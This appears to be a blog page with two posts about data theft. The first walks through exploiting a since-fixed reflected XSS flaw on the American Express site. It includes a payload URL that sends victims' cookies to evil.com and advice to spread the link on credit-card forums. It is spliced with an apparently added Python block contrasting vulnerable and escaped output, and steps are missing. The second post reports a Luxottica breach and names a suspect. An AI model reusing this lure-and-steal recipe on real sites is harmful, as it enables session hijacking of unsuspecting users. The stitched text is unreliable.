Posts Tagged ‘Data theft’
Here is a quick description of a cross-site scripting (XSS) exploit that was fixed today on the American Express website.
All you need to do is:
1) Set up a web server, or register for a free web hosting service that supports any type of server-side script (Perl, PHP, ASP etc.)
2) Create a script to save the stolen cookies into a file or database and put it online.
Where XXX is your code that does whatever you want it to do. If you want to steal the cookie, the code would then be something like:
So the link to use to lure people into sending their cookies would be something like: http://find.americanexpress.com/search?q=%22%3E%3Cscript%3Elocation.href='http://evil.com/cookie.php?'%2Bdocument.cookie%3C/script%3E
4) Place this link on forums about American Express or credit cards (since there is a better chance that people using these forums are using the Amex website, and therefore have cookies…)
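The flaw behind the link above is a search page that reflects the `q` parameter into its HTML without encoding it, so a `"><script>` sequence closes the attribute and becomes live markup. The following is an added example (not code from the post, and not American Express's code) showing the vulnerable reflection next to the corrected one, plus the cookie flag that keeps a session token out of `document.cookie`. The URL, host names, the input template and the handler functions are all constructed for illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample: a search URL of the shape described in the post, with the
# "><script>... payload in q. Hosts are placeholders, not real sites.
SAMPLE_URL = (
    "http://search.example.test/search?q=%22%3E%3Cscript%3Elocation.href="
    "%27http://collector.example.test/c.php?%27%2Bdocument.cookie%3C/script%3E"
)

# The fragment of the results page that echoes the search term back to the user.
TEMPLATE = '<input type="text" name="q" value="{value}">'


def query_param(url, name):
    """Return the decoded value of one query parameter (first occurrence, or '')."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get(name, [""])[0]


def render_vulnerable(q):
    """Reflect the term with no encoding: the defect the post describes."""
    return TEMPLATE.format(value=q)


def render_fixed(q):
    """Reflect the term after HTML-escaping it, so quotes and brackets are inert text."""
    return TEMPLATE.format(value=html.escape(q, quote=True))


def contains_script_tag(rendered):
    """Rough check used here only to show the difference: is a <script> tag present?"""
    return "<script" in rendered.lower()


def session_cookie_header(name, value):
    """Set-Cookie header with HttpOnly, so script in the page cannot read the session id,
    and Secure so it is only sent over TLS (defence in depth; output encoding is the fix)."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    term = query_param(SAMPLE_URL, "q")
    print("vulnerable:", render_vulnerable(term))
    print("fixed:     ", render_fixed(term))
    print(session_cookie_header("sessionid", "constructed-token"))
```

Running it prints the unescaped output with a live `<script>` element, then the escaped version where the same input is rendered as `&quot;&gt;&lt;script&gt;...` inside the attribute. Encoding at the point of output is what closes the hole; the `HttpOnly` flag is a separate layer that limits what a script injected elsewhere can read.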
This XSS has now been fixed, after it started to go public. The person who found the bug had a particularly hard time convincing Amex of this security problem.
A video of the simple exploit is available at: http://holisticinfosec.org/video/online_finance/amex.html
“American Express web bug exposes card holders”, Dan Goodin, The Register, December 16, 2008, http://www.theregister.co.uk/2008/12/16/american_express_website_bug/ (accessed on December 17, 2008)
“Holistic Security”, Russ McRee, December 17, 2008, http://holisticinfosec.blogspot.com/2008/12/online-finance-flaw-american-express.html (accessed on December 17, 2008)
Retail giant Luxottica Retail, distributor of brands such as Anne Klein, Bulgari, Chanel and Ralph Lauren, has been hacked, and information about 59 000 former employees has been stolen from its mainframe.
According to Lt. Jeff Braley of the Cyber Crimes Task Force of the Warren County Sheriff, the suspected hacker breached the mainframe without even hiding her IP address. This incredible omission led the police to a woman called Molly Burns, a 30-year-old resident of Glendale, Arizona. Burns' apartment was raided this summer during a heroin raid, and an unspecified number of computers were seized by the police.
“You not only see the criminal history this suspect has, but you see the ties that they have and that is much more worrisome,” Braley said.
According to News 5, the arrest record of the suspected hacker includes forgery, theft and drug abuse. Burns is now on the run, and three different police departments in Arizona are also looking for her. The FBI will soon take over the case.
No details were given on how the attack was carried out. Any additional information would be appreciated. Luxottica Retail claimed that their systems have since been secured.
“Thousands At Risk After Hacker Breaches Computer Mainframe”, Eric Flack, WLWT, November 24, 2008, http://www.wlwt.com/news/18055756/detail.html (accessed on November 25, 2008)